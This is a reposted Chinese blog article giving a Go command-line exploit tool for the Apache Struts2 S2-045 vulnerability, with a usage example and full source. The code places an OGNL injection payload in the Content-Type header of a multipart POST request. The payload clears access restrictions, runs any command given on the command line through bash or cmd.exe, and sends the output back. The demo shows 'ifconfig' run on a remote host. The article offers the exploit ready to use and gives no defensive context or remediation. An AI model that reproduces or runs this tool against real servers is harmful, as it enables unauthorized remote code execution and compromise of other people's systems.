转载

Struts2漏洞利用工具exp-golang

使用方法:

system@mac:~/golang/src/s2-045$ ./main http://xxx.com/1.jsp ifconfig
200
map[Server:[Apache-Coyote/1.1] Date:[Tue, 21 Mar 2017 06:08:39 GMT]]
eth0      Link encap:Ethernet  HWaddr 52:54:E4:D1:15:00
          inet addr:192.168.1.8  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::5054:e4ff:fed1:1500/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:9999952 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6667457 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:6575210434 (6.1 GiB)  TX bytes:939669875 (896.1 MiB)

源代码:

package main
import (
    "bytes"
    "flag"
    "fmt"
    "log"
    "mime/multipart"
    "net/http"
)
/* 给body添加类似上传文件的mime/multipart内容 */
func newMultipartRequest(url string, params map[string]string) (*http.Request, error) {
    body := &bytes.Buffer{}
    writer := multipart.NewWriter(body)
    for key, val := range params {
        _ = writer.WriteField(key, val)
    }
    writer.Close()
    return http.NewRequest("POST", url, body)
}
func main() {
    flag.Parse()
    url := flag.Arg(0)
    cmd := flag.Arg(1)
    payload := "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)" +
        ":((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensym" +
        "phony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear())" +
        ".(#context.setMemberAccess(#dm)))).(#cmd='" + cmd + "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().c" +
        "ontains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds))." +
        "(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOut" +
        "putStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
    extraParams := map[string]string{
        "Test": "",
    }
    request, err := newMultipartRequest(url, extraParams)
    if err != nil {
        log.Fatal(err)
    }
    request.Header.Set("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36")
    request.Header.Set("Content-Type", payload)
    client := &http.Client{}
    resp, err := client.Do(request)
    if err != nil {
        log.Fatal(err)
    } else {
        /* 读取response返回数据 */
        body := &bytes.Buffer{}
        _, err := body.ReadFrom(resp.Body)
        if err != nil {
            log.Fatal(err)
        }
        resp.Body.Close()
        fmt.Println(resp.StatusCode)
        fmt.Println(resp.Header)
        fmt.Println(body)
    }
}
原文  https://studygolang.com/articles/24749
正文到此结束
Loading...